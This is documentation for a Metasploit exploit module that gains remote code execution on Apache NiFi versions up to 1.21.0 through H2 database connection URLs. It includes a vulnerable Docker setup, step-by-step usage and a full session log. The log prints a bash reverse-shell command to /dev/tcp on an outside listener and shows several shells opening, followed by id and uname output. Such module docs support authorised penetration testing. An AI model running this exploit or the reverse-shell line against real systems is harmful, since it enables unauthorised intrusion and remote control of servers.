## Vulnerable Application

The DBCPConnectionPool and HikariCPConnectionPool Controller Services in
Apache NiFi 0.0.2 through 1.21.0 allow an authenticated and authorized user
to configure a Database URL with the H2 driver that enables custom code execution.
This exploit will create a new ExecuteSQL process, connect it to a DB Connection
Pool, and create a new H2 based connection.  The connection is able to create
a new memory based h2 database on the fly, with a code execution inlined that
executes when the H2 connection, and process are started.

This exploit will result in several shells (5-7).
Successfully tested against Apache nifi 1.16.0 through 1.21.0.

### Vulnerable Docker Images

Docker images are available, and exploitable in the default configuration.

```
docker run -p 8443:8443 apache/nifi:1.20.0
```

After the image runs for a minute or two, you'll need to grab a set of credentials
by running grep against the logs:

```
docker logs [container_id] | grep Generated
```

## Verification Steps

1. Install the application
1. Start msfconsole
1. Do: `use exploit/linux/http/apache_nifi_h2_rce `
1. Do: `set username [username]`
1. Do: `set password [password]`
1. Do: `set rhosts [ip]`
1. Do: `set lhost [ip]`
1. Do: `run`
1. You should get a shell.

## Options

### DELAY

The delay time before stopping and deleting the processor and DB connection pool. Defaults to `15`

## Scenarios

### Nifi 1.20.0 on Docker

```
msf6 > use exploit/linux/http/apache_nifi_h2_rce 
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/http/apache_nifi_h2_rce) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 exploit(linux/http/apache_nifi_h2_rce) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf6 exploit(linux/http/apache_nifi_h2_rce) > set username 4b6caac4-e1c6-431d-8e63-f014a6541362
username => 4b6caac4-e1c6-431d-8e63-f014a6541362
msf6 exploit(linux/http/apache_nifi_h2_rce) > set password E3ke7kCROjBabztg0acFemg5xk2QiQs1
password => E3ke7kCROjBabztg0acFemg5xk2QiQs1
msf6 exploit(linux/http/apache_nifi_h2_rce) > set verbose true
verbose => true
msf6 exploit(linux/http/apache_nifi_h2_rce) > exploit

[+] bash -c '0<&126-;exec 126<>/dev/tcp/1.1.1.1/4444;sh <&126 >&126 2>&126'
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Apache NiFi instance supports logins and vulnerable version detected: 1.20.0
[+] Retrieved process group: c34bfd91-0189-1000-a1ab-44dda04d471e
[+] Created processor c34ccd20-0189-1000-5ee2-06eb40644237 in process group c34bfd91-0189-1000-a1ab-44dda04d471e
[+] Configured processor c34ccd20-0189-1000-5ee2-06eb40644237
[+] Configured db connection pool rkkIaE (c34cccc4-0189-1000-22c2-9fa3bb57d87b)
[+] Enabling db connection pool
[+] Starting processor
[*] Command shell session 1 opened (1.1.1.1:4444 -> 172.17.0.2:49468) at 2023-08-04 21:25:44 -0400
[*] Waiting 15 seconds before stopping and deleting
[*] Command shell session 2 opened (1.1.1.1:4444 -> 172.17.0.2:49470) at 2023-08-04 21:25:45 -0400
[*] Command shell session 3 opened (1.1.1.1:4444 -> 172.17.0.2:49478) at 2023-08-04 21:25:46 -0400
[*] Command shell session 4 opened (1.1.1.1:4444 -> 172.17.0.2:49488) at 2023-08-04 21:25:49 -0400
[*] Command shell session 6 opened (1.1.1.1:4444 -> 172.17.0.2:54526) at 2023-08-04 21:25:50 -0400
[*] Command shell session 7 opened (1.1.1.1:4444 -> 172.17.0.2:54534) at 2023-08-04 21:25:51 -0400
[+] Stopped and terminated processor c34ccd20-0189-1000-5ee2-06eb40644237
[*] Found newer revision of c34ccd20-0189-1000-5ee2-06eb40644237, attempting to delete version 4
[+] Deleted processor c34ccd20-0189-1000-5ee2-06eb40644237
[+] Disabled db connection pool c34cccc4-0189-1000-22c2-9fa3bb57d87b, sleeping 15 seconds to allow the connection to finish disabling
[*] Found newer revision of c34cccc4-0189-1000-22c2-9fa3bb57d87b, attempting to delete version 1
[*] Found newer revision of c34cccc4-0189-1000-22c2-9fa3bb57d87b, attempting to delete version 2
[*] Found newer revision of c34cccc4-0189-1000-22c2-9fa3bb57d87b, attempting to delete version 3
[*] Found newer revision of c34cccc4-0189-1000-22c2-9fa3bb57d87b, attempting to delete version 4
[+] Deleted db connection pool c34cccc4-0189-1000-22c2-9fa3bb57d87b

id
uid=1000(nifi) gid=1000(nifi) groups=1000(nifi)
uname -a
Linux 06967477694d 6.3.0-kali1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.3.7-1kali1 (2023-06-29) x86_64 x86_64 x86_64 GNU/Linux
```
